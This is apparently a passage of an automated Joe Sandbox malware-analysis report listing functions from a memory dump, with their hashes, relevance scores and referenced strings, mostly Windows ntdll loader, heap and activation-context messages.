                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                        • API String ID: 3446177414-2547482624
                                                                                        • Opcode ID: bc8f88606cbfb0c1948b5d73b5c13d76e2dbe31950a11fc51082ec37e1c5cc2f
                                                                                        • Instruction ID: 4bcdcca67a9335fc97ef39e64c92672c04f17d5dea846e22f42786d22a44b48c
                                                                                        • Opcode Fuzzy Hash: bc8f88606cbfb0c1948b5d73b5c13d76e2dbe31950a11fc51082ec37e1c5cc2f
                                                                                        • Instruction Fuzzy Hash: 2651C3715247428FDB24DF68D5446A7FBE9AF84304F20483EFA9987241E770D549CF92
                                                                                        Function 0179A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                        • API String ID: 0-379654539
                                                                                        • Opcode ID: 8132730349148cc4fca85cf1a399da97624190a5309de53b0140775c924849d3
                                                                                        • Instruction ID: 459029db37cbaaea54f8ba93788b9483935ef89f137d4535fc904bcc6c80294d
                                                                                        • Opcode Fuzzy Hash: 8132730349148cc4fca85cf1a399da97624190a5309de53b0140775c924849d3
                                                                                        • Instruction Fuzzy Hash: BAC169752093828FDB11CF58D044B6AF7E4BF94704F1489AEFA958B361E734CA49CB92
                                                                                        Function 017C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • LdrpInitializeProcess, xrefs: 017C8422
                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017C855E
                                                                                        • @, xrefs: 017C8591
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017C8421
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-1918872054
                                                                                        • Opcode ID: db99dab4aae6e98f3a69347653bf12131245f2efd668404a24132d05dc13d30d
                                                                                        • Instruction ID: ea78b7b830fda6a6f7a884579b40e37992d5d55eb0ed3914b6d7baf593da3f91
                                                                                        • Opcode Fuzzy Hash: db99dab4aae6e98f3a69347653bf12131245f2efd668404a24132d05dc13d30d
                                                                                        • Instruction Fuzzy Hash: 43916B71508349AFD722DF65CC44FABFAE8AF98B44F40092EFA84D6155E374DA048B62
                                                                                        Function 017C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018022B6
                                                                                        • .Local, xrefs: 017C28D8
                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018021D9, 018022B1
                                                                                        • SXS: %s() passed the empty activation context, xrefs: 018021DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                        • API String ID: 0-1239276146
                                                                                        • Opcode ID: 8f959b3563f8da1b872e36aa78b16198630499ec13f33577f91cdafaa038d17b
                                                                                        • Instruction ID: 0fdd69dce77eca76bcfed7f106b2cd65dd83996ee1099752ff1129c0e0ff02af
                                                                                        • Opcode Fuzzy Hash: 8f959b3563f8da1b872e36aa78b16198630499ec13f33577f91cdafaa038d17b
                                                                                        • Instruction Fuzzy Hash: 1CA1BD319402299FDB25CFA8CC88BA9F7B5BF58714F1541EDD908AB292D7709E80CF90
                                                                                        Function 017C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01803456
                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01803437
                                                                                        • RtlDeactivateActivationContext, xrefs: 01803425, 01803432, 01803451
                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0180342A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                        • API String ID: 0-1245972979
                                                                                        • Opcode ID: 7627b60474f8081b02fff4505f29c21c6e3470a15db102f179372a7040054692
                                                                                        • Instruction ID: 3a4e667c25644435cf25402a68f7cb2c3144390939ba6f44985dcae56ce11acf
                                                                                        • Opcode Fuzzy Hash: 7627b60474f8081b02fff4505f29c21c6e3470a15db102f179372a7040054692
                                                                                        • Instruction Fuzzy Hash: 14611076600A16AFD7238F1CC895B2AF7E5BF90B10F15852DE9569F290C730E901CB91
                                                                                        Function 017964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017F0FE5
                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017F106B
                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017F1028
                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017F10AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                        • API String ID: 0-1468400865
                                                                                        • Opcode ID: 73983434231b718049db7c4ea6df95533095ddf46498ca8f0d58049c74edce65
                                                                                        • Instruction ID: 7d5b141d6b296b2d68d788c8abd72c17a1feaac9b8b1fd15d259640f225f2f1e
                                                                                        • Opcode Fuzzy Hash: 73983434231b718049db7c4ea6df95533095ddf46498ca8f0d58049c74edce65
                                                                                        • Instruction Fuzzy Hash: E171D2B19043059FCB21EF18D888B9BBFE8AF55764F504568F9488B28AD734D588CBD2
                                                                                        Function 017A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • HEAP: , xrefs: 017A3264
                                                                                        • HEAP[%wZ]: , xrefs: 017A3255
                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017A327D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                        • API String ID: 0-617086771
                                                                                        • Opcode ID: f137c0e9c8a2e47edd3df72a8db05ef9919ac1b3a78d5d2c4160a2fccb0a967b
                                                                                        • Instruction ID: 22f8397c079d1a99ddf1d1f3b29f958b2cce7e6c0511670ed78aa57932895ee9
                                                                                        • Opcode Fuzzy Hash: f137c0e9c8a2e47edd3df72a8db05ef9919ac1b3a78d5d2c4160a2fccb0a967b
                                                                                        • Instruction Fuzzy Hash: 3C92AC71A046499FDB25CF68C444BAEFBF1FF88300F588299E959AB392D734A941CF50
                                                                                        Function 017B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $@
                                                                                        • API String ID: 0-1077428164
                                                                                        • Opcode ID: d8c5a7fdda0937e0a3a6de845e52f4ea50adef51deaec895ead2582d7bf5e053
                                                                                        • Instruction ID: eb94983e7837a5293acfc5b0b9a8fabd8a21b1628fddf6745a4296182992abb2
                                                                                        • Opcode Fuzzy Hash: d8c5a7fdda0937e0a3a6de845e52f4ea50adef51deaec895ead2582d7bf5e053
                                                                                        • Instruction Fuzzy Hash: C6C25D716083459FD729CF28C881BABFBE5AFC8754F04896DFA8987281D734D845CB52
                                                                                        Function 0178A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                        • API String ID: 0-2779062949
                                                                                        • Opcode ID: 6b33c916946b8ad87baa37795249d7d0f6732bcd5d3cf0bcb386056880b102e1
                                                                                        • Instruction ID: 2ff96cd6f5952122b817414a42943d8cd069e56501d6abef80a991aad495dd1d
                                                                                        • Opcode Fuzzy Hash: 6b33c916946b8ad87baa37795249d7d0f6732bcd5d3cf0bcb386056880b102e1
                                                                                        • Instruction Fuzzy Hash: 8FA13C759016299BDB329B68CC88BE9F7F8EF48710F1041EADA09A7250D7359E85CF50
                                                                                        Function 017A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-1334570610
                                                                                        • Opcode ID: 6b1d6a708b445936b9177e5fbeef598916bc9dbe0c91f3b41e10dd950deb7a39
                                                                                        • Instruction ID: d7c19e86d45bc59341681f854f356f7ebc8a8d78e7309fca3bc62aa8f0d6ff53
                                                                                        • Opcode Fuzzy Hash: 6b1d6a708b445936b9177e5fbeef598916bc9dbe0c91f3b41e10dd950deb7a39
                                                                                        • Instruction Fuzzy Hash: E361CF70600301DFDB29CF28C984B6AFBE1FF84308F548A9DE9468B292D770E941CB91
                                                                                        Function 0184C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • @, xrefs: 0184C1F1
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0184C1C5
                                                                                        • PreferredUILanguages, xrefs: 0184C212
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                        • API String ID: 0-2968386058
                                                                                        • Opcode ID: 08a8282af26bc21e2dbc4fc5676b583454c81c5918061c1580ec2ee0d8995acb
                                                                                        • Instruction ID: c6080cd6b216677ce114bb2e7ad0d3dd8605179ab84eadedfe5a054d431ecf2b
                                                                                        • Opcode Fuzzy Hash: 08a8282af26bc21e2dbc4fc5676b583454c81c5918061c1580ec2ee0d8995acb
                                                                                        • Instruction Fuzzy Hash: 16416271E0121EABDB11DED9C855BEEFBBCAB14704F14416AE609E7280EBB49B448B50
                                                                                        Function 01824144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                        • API String ID: 0-1373925480
                                                                                        • Opcode ID: 568f74b13463629be769e12e49532ad4ddf0cba7792282ca7ca70783cc650bcd
                                                                                        • Instruction ID: a18def77393db30abc19ec269e1966914c300e8bbaceaca2f52516aa4819af0f
                                                                                        • Opcode Fuzzy Hash: 568f74b13463629be769e12e49532ad4ddf0cba7792282ca7ca70783cc650bcd
                                                                                        • Instruction Fuzzy Hash: B0412631A00668CBEB27DBE9C844BADFBB8FF56344F240559D901EB781D7748A81CB61
                                                                                        Function 017A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-2558761708
                                                                                        • Opcode ID: c1623926aafe7ab0acc30d5b95224098f095ce1dad853001328b30054351c395
                                                                                        • Instruction ID: 1a3bc0e3b04cefb6ea62c282362529b482891bf47b4341d6edeb8caec9a55064
                                                                                        • Opcode Fuzzy Hash: c1623926aafe7ab0acc30d5b95224098f095ce1dad853001328b30054351c395
                                                                                        • Instruction Fuzzy Hash: 8311DC31359102DFDB29DA18C854B7AF3A4EF80A16F1886ADF906CB255DB34E840C755
                                                                                        Function 018120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • LdrpInitializationFailure, xrefs: 018120FA
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01812104
                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 018120F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-2986994758
                                                                                        • Opcode ID: 7fd4223bee133bd10622329b15ef74172662bc9e3f5d1f33ad1c3555a70b69a0
                                                                                        • Instruction ID: c214b9b2c1799054da273496ef929458a08e6d6758b2cea98c1c0795e6bf5441
                                                                                        • Opcode Fuzzy Hash: 7fd4223bee133bd10622329b15ef74172662bc9e3f5d1f33ad1c3555a70b69a0
                                                                                        • Instruction Fuzzy Hash: 6DF02875640308ABEB20E60CCC56F99B76CFB40B04F200068FA00B7285D1B0EB40CA41
                                                                                        Function 017A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: #%u
                                                                                        • API String ID: 48624451-232158463
                                                                                        • Opcode ID: f95a3a8c57fb841490bb7549d4c388d3dce522b84deec8ec40a9609b0ccca525
                                                                                        • Instruction ID: 09efe670fbb5b4bce81f99dc862a7db26621d30a0b97fa7a99b3c47cc4c6c0db
                                                                                        • Opcode Fuzzy Hash: f95a3a8c57fb841490bb7549d4c388d3dce522b84deec8ec40a9609b0ccca525
                                                                                        • Instruction Fuzzy Hash: 9F714C71A0014A9FDB01DFA8C994FAEB7F8BF48704F144169EA05E7255EA34EE41CBA1
                                                                                        Function 0181892A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0181895E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                        • API String ID: 0-702105204
                                                                                        • Opcode ID: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                                                                        • Instruction ID: d2ffa2581a9c7cf945c2de7f69fe33c4a8bc903ff6b5f3d2f0be441228b6bed1
                                                                                        • Opcode Fuzzy Hash: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                                                                        • Instruction Fuzzy Hash: B0012B337402059BE7206F5DDCC5A6ABF6EEF83764F04001CF641C6159CF206A84CB92
                                                                                        Function 0179A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • LdrResSearchResource Exit, xrefs: 0179AA25
                                                                                        • LdrResSearchResource Enter, xrefs: 0179AA13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                        • API String ID: 0-4066393604
                                                                                        • Opcode ID: 9776da6fae2d853ec10cfcbac64a464b4212714fc4276958faa65c609341912c
                                                                                        • Instruction ID: 7a0ca3351cd718a0b0ed2628251d6e6376d39863d6257fb14ca37096c6e30403
                                                                                        • Opcode Fuzzy Hash: 9776da6fae2d853ec10cfcbac64a464b4212714fc4276958faa65c609341912c
                                                                                        • Instruction Fuzzy Hash: 15E18F71A05219ABEF22CE9DD984BAEFBBAFF14314F10456AEA01E7241D738D944CB50
                                                                                        Function 0185A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `$`
                                                                                        • API String ID: 0-197956300
                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                        • Instruction ID: 0f7d451e24f36911df043c659d93df19f144587567b65ea8cc9036e1ce32ada9
                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                        • Instruction Fuzzy Hash: 12C1D1312043469BE768CE28C884B6BBBE5EFC4358F044A2DFA95C7291D775D605CB52
                                                                                        Function 0180E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Legacy$UEFI
                                                                                        • API String ID: 2994545307-634100481
                                                                                        • Opcode ID: 9559308b011c8cced47c74634912fdf9e3df6560e487f2bdfb2bf417ac7116ef
                                                                                        • Instruction ID: b3922b293bd7796f9a00fae1dc24da71a70f29acede62e6470b9205829499f68
                                                                                        • Opcode Fuzzy Hash: 9559308b011c8cced47c74634912fdf9e3df6560e487f2bdfb2bf417ac7116ef
                                                                                        • Instruction Fuzzy Hash: E0615D71E0420D9FDB65DFA8CD40BAEBBB9FB48704F54486DE649EB291D731AA00CB50
                                                                                        Function 018343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
